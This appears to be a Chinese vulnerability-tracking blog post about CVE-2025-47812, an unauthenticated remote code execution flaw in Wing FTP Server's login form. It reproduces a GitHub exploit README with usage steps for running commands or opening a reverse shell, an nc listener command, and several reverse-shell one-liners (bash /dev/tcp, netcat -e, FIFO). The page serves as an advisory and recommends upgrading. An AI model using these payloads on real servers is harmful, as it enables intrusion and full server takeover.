Wing FTP Server Remote Code Execution (RCE)

漏洞信息

漏洞名称: Wing FTP Server Remote Code Execution (RCE)

漏洞编号:

  • CVE: CVE-2025-47812

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Wing FTP Server是一款广泛使用的FTP服务器软件,支持多种操作系统,常用于企业级文件传输服务。该软件因其易用性和功能性,在多个行业中被广泛部署。此次发现的漏洞CVE-2025-47812,是一个未经身份验证的远程代码执行漏洞,攻击者可以利用此漏洞在目标服务器上执行任意命令或开启反向shell,无需任何认证。漏洞的技术根源在于Wing FTP Server的web接口在处理登录表单(/loginok.html)中的null字节(%00)时存在缺陷,导致攻击者可以将Lua代码注入到会话文件中。当访问如/dir.html等端点时,这些会话文件会被评估,从而执行注入的恶意代码。此漏洞的影响极为严重,攻击者可以完全控制受影响的服务器,执行任意系统命令,窃取敏感数据,甚至利用服务器作为跳板进行进一步的网络攻击。由于漏洞利用无需认证,且可以自动化执行,因此风险极高。建议所有使用Wing FTP Server的用户立即升级到7.4.4或更高版本,以修复此漏洞。

产品厂商: Wing FTP Server

产品名称: Wing FTP Server

影响版本: < 7.4.4

来源: https://github.com/blindma1den/CVE-2025-47812

类型: CVE-2025:github search

仓库文件

  • README.md
  • exploit.py

来源概述

===========================================================

CVE-2025-47812 - Wing FTP Server Remote Code Execution (RCE)

===========================================================

Author: blindma1den

Date: July 2025

Exploit Type: Remote Code Execution (Unauthenticated)

Target: Wing FTP Server < 7.4.4

CVSS Score: 10.0 (Critical)

DESCRIPTION

This script exploits CVE-2025-47812, a critical vulnerability
in Wing FTP Server’s web interface that allows remote attackers
to execute arbitrary system commands or open a reverse shell
without authentication.

The flaw is caused by improper handling of null bytes (%00)
in the login form (/loginok.html). This allows Lua code
injection into session files, which are later evaluated
when endpoints like /dir.html are accessed.

SOURCES

NVD Description: https://nvd.nist.gov/vuln/detail/CVE-2025-47812

FEATURES

  • Command execution (e.g., whoami, uname -a)
  • Multiple reverse shell payloads
  • Extracts UID session cookie automatically
  • Clean modular Python 3 implementation

REQUIREMENTS

  • Python 3.7+
  • requests module

Install dependencies:

1
pip install requests

USAGE

Run the script:

1
python3 wingftp_rce_exploit.py

You will be prompted for:

  • Target URL (e.g., http://127.0.0.1:5466)
  • Username (default: anonymous)
  • Exploit mode:
    [1] Run a command
    [2] Launch reverse shell

EXAMPLES

[1] RUN COMMAND:

1
2
3
4
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami

[2] REVERSE SHELL:

1
2
3
4
5
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444

Start your listener before triggering the shell:

1
nc -lvnp 4444

PAYLOADS USED (REVERSE SHELL)

Bash:
bash -i >& /dev/tcp/IP/PORT 0>&1

Python3:
python3 -c ‘import socket,subprocess,os; …’

Netcat:
nc IP PORT -e /bin/sh

PHP:
php -r ‘$sock=fsockopen(“IP”,PORT); …’

FIFO + Netcat:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i …

DISCLAIMER

This code is for educational purposes only. Do NOT use
this exploit against systems you do not own or have explicit
authorization to test. Unauthorized use is illegal and unethical.

Patch your systems immediately. Wing FTP Server 7.4.4 resolves
this vulnerability.

Happy hacking!

Github Poc
#命令执行 #CVE-2025:github search
Wing FTP Server Remote Code Execution (RCE)
http://example.com/2025/07/17/github_565169772/
作者
lianccc
发布于
2025年7月17日
许可协议